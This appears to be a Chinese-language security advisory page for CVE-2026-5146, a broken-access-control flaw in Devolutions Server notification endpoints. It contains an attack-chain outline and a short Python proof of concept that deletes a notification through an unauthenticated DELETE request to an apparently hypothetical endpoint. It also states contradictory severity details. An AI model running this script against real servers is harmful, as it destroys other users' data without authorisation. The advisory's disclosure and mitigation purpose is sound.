CVE-2026-5146 Devolutions Server访问控制失效

漏洞信息

漏洞编号

CVE-2026-5146

漏洞类型

访问控制失效

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Devolutions Server

漏洞概述

Devolutions Server在通知管理端点存在不当的访问控制漏洞。由于系统未正确实施会话验证，未经身份验证的远程攻击者可利用此缺陷，通过构造恶意请求修改或删除系统中任意用户的通知记录。该漏洞影响特定版本范围内的Devolutions Server，可能导致敏感通知数据被篡改或丢失，对系统的数据完整性和机密性构成威胁。

技术细节

该漏洞的根源在于Devolutions Server处理通知管理相关API端点时，未能正确实施访问控制列表（ACL）和会话验证机制。在正常业务逻辑中，读取、修改或删除用户通知记录应当要求请求者具备有效的用户会话身份。然而，在受影响版本中，特定接口允许未携带有效认证凭证的HTTP请求通过。攻击者可以通过网络直接向目标服务器发送特制的POST或DELETE请求，指定目标用户的ID或通知ID，从而绕过身份认证直接操作数据。尽管CVSS向量中完整性影响标记为无，但实际描述表明记录可被修改或删除，这意味着攻击者能够篡改审计日志或干扰用户工作流。由于攻击无需用户交互（UI:N），此类漏洞可被自动化脚本大规模利用，对企业内部通信安全造成严重影响。

攻击链分析

STEP 1

侦查

攻击者识别出目标服务器运行的是受影响版本的Devolutions Server。

STEP 2

武器化

攻击者构造恶意的HTTP请求（如DELETE或PUT），指向通知管理端点，并在请求中指定目标用户的通知ID。

STEP 3

利用

攻击者直接向目标服务器发送该请求，由于缺乏会话验证，服务器接受了该请求。

STEP 4

影响

服务器执行了操作，导致指定的通知记录被修改或删除，造成数据丢失或篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vulnerability(target_host, notification_id):
    """
    PoC to check for improper access control in notification endpoints.
    Attempts to delete a notification without authentication.
    """
    # Construct the target URL (Hypothetical endpoint based on description)
    target_url = f"{target_host}/api/notifications/{notification_id}"
    
    headers = {
        "User-Agent": "CVE-2026-5146-Scanner/1.0",
        "Content-Type": "application/json"
    }

    try:
        # Send DELETE request without session cookies or auth headers
        response = requests.delete(target_url, headers=headers, verify=False, timeout=10)
        
        if response.status_code == 200 or response.status_code == 204:
            print(f"[+] Vulnerability confirmed! Notification {notification_id} deleted.")
            return True
        elif response.status_code == 401 or response.status_code == 403:
            print("[-] Access denied. Target may be patched.")
            return False
        else:
            print(f"[?] Unexpected response code: {response.status_code}")
            return False
            
    except Exception as e:
        print(f"[!] Error connecting to target: {e}")
        return False

# Example usage
# check_vulnerability("https://devolutions-server.example.com", 1001)

影响范围

Devolutions Server 2026.1.6.0 - 2026.1.15.0

Devolutions Server <= 2025.3.19.0

防御指南

临时缓解措施

建议管理员立即检查Devolutions Server的访问日志，排查是否存在异常的API调用记录。在未升级版本前，可通过网络防火墙（WAF）规则限制对通知管理相关API端点的访问，仅允许受信任的IP地址或经过严格验证的请求通过，以阻断未经授权的访问尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5146
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5146
3 Details https://www.cvedetails.com/cve/CVE-2026-5146/
4 VulDB https://vuldb.com/cve/CVE-2026-5146
5 Link https://devolutions.net/security/advisories/DEVO-2026-0012

CVE-2026-5146 Devo​​lutions Server访问控制失效